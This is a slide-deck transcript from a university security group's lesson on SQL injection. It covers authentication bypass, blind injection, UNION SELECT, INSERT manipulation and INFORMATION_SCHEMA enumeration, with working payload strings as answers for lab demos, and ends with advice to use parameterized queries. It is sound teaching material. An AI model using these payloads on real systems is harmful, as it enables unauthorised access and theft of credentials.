1 / 22

Web SecuritY Week 2

Web SecuritY Week 2. Computer Security Group University of Texas at Dallas. SQL Injection. Overview. Injection attacks – user takes advantage of poor input sanitization to insert data into the client application that is passed (and trusted) to a server application

jenis
Download Presentation

Web SecuritY Week 2

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web SecuritY Week 2 Computer Security Group University of Texas at Dallas

  2. SQL Injection

  3. Overview • Injection attacks – user takes advantage of poor input sanitization to insert data into the client application that is passed (and trusted) to a server application • SQL injection – users exploits the trust that the database engine has in the web server by giving the web server data that alters a query • Another injection is command injection – targets system process execution

  4. Example • To select a user:SELECT * from users WHERE name = 'Bob'; • The username is determined at runtime, so let’s make it:SELECT * from users WHERE name = '$name'; • For example, if $name is “Joe”:SELECT * from users WHERE name = 'Joe';

  5. Attack • Let’s give it a string that will change the query once substituted into it. • Attack string is:' or '1' ='1 • When plugged into the query, the following is produced:SELECT * from users where NAME ='' or '1'='1'; • This always returns a row

  6. Demo • 10.176.169.7/web_demo/week2/welcome1.html

  7. Answers • User: admin • Password: p' OR '1'='1

  8. Blind Injection • Only returns True or False. • Used to discover information about entries.

  9. Demo • 10.176.169/web_demo/week2/welcome1.html

  10. Answers • User: admin • Password: ' OR pass LIKE 't% • Repeat for further characters. • Usually Scripted

  11. UNION SELECT • SELECT money from users where id = $id; • We control the $id variable • Utilize UNION to forge our own data:0 UNION SELECT 1000000 • Resulting query:SELECT money from users where id = 0 UNION SELECT 1000000;

  12. Demo • 10.176.169.7/web_demo/week2/welcome1.html

  13. Answers • User: any1 • Password: ' UNION SELECT 'admin', 'any2

  14. Table Modification • Previously we exploited SELECT this exploits INSERT. • INSERT INTO users VALUES (“string1”, “string2”)

  15. Demo • 10.176.169.7/web_demo/week2/welcome3.html

  16. Answers • User: any • Password: pass', 1);--

  17. Table Traversal • In MYSQL there is a static table called INFORMATION_SCHEMA • This reveals information about other tables. • Combine with UNION SELECT to get other tables.

  18. Demo • 10.176.169.7/web_demo/week2/welcome2.html

  19. Answers • Username: newb • Password: ' UNION SELECT TABLE_NAME, 0 FROM INFORMATION_SCHEMA.TABLES;-- • Username: newb • Password: ' UNION SELECT COLUMN_NAME, 0 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='passwords • Quest Hint: ' UNION SELECT pass, name FROM passwords;--

  20. The Final Quest • 10.176.169.7/web_demo/week2/welcome2.html • Find the secret flag.

  21. Mitigation • Parameterized queries. In PHP: • Stupid way:$db->query(“select user where id = $id”); • Smart way:$db->prepare(“select user where id = :id”);$db->execute(array(‘:id’ => $id)); • This is better because the DB doesn’t need to trust the web server since the actual query doesn’t change • DON’T FILTER, USE PREPARED STATEMENTS / PARAMETERIZED QUERIES

  22. END • End of Week 2

More Related